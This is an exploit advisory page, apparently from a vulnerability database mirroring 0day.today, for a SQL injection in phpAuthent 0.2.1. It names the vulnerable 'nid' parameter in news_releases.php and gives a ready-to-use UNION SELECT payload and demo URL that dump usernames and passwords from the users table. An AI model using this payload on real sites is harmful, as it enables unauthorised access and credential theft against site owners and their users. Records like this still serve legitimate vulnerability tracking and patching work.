Lucene search

phpAuthent 0.2.1 SQL Injection Vulnerability

🗓️ 19 Mar 2010 00:00:00Reported by GamoscuType

zdt🔗 0day.today👁 12 Views

phpAuthent 0.2.1 SQL Injection Vulnerability on news_releases.php?ni

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

============================================
phpAuthent 0.2.1 SQL Injection Vulnerability
============================================

phpAuthent 0.2.1 SQL Injection  Vulnerability
     
###########################
     
Author    : Gamoscu
  
Homepage  : http://www.1923turk.com 
 
Blog      : http://gamoscu.wordpress.com/ 
 
Script    : phpAuthent http://phpauth.sourceforge.net/
 
Download  : http://phpauth.sourceforge.net/download.php
     
###########################  
       
[ Vulnerable File ]
   
news_releases.php?nid= [ SQL ]
        
   
[ XpL ]
     
-1+union+select+1,2,3,username,password,6,7+from+phpauthent_users
 
[ Demo]
 
http://server/news_releases.php?nid=-1+union+select+1,2,3,username,password,6,7+from+phpauthent_users



#  0day.today [2018-03-02]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

19 Mar 2010 00:00Current

7.1High risk

Vulners AI Score7.1